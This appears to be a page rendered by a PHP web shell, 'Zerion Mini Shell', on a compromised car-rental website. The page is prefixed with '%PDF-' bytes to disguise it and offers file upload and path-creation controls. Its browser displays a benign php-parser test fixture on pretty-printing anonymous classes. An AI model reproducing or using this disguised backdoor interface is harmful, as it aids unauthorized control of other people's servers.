%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/car_rent/vendor/nikic/php-parser/test/code/prettyPrinter/expr/
Upload File :
Create Path :
Current File : /var/www/html/car_rent/vendor/nikic/php-parser/test/code/prettyPrinter/expr/anonymousClass.test

Anonymous classes
-----
<?php

new class {};
new class extends A implements B, C {};
new class($a) extends A {
    private $a;
    public function __construct($a) {
        $this->a = $a;
    }
};
-----
new class
{
};
new class extends A implements B, C
{
};
new class($a) extends A
{
    private $a;
    public function __construct($a)
    {
        $this->a = $a;
    }
};

Zerion Mini Shell 1.0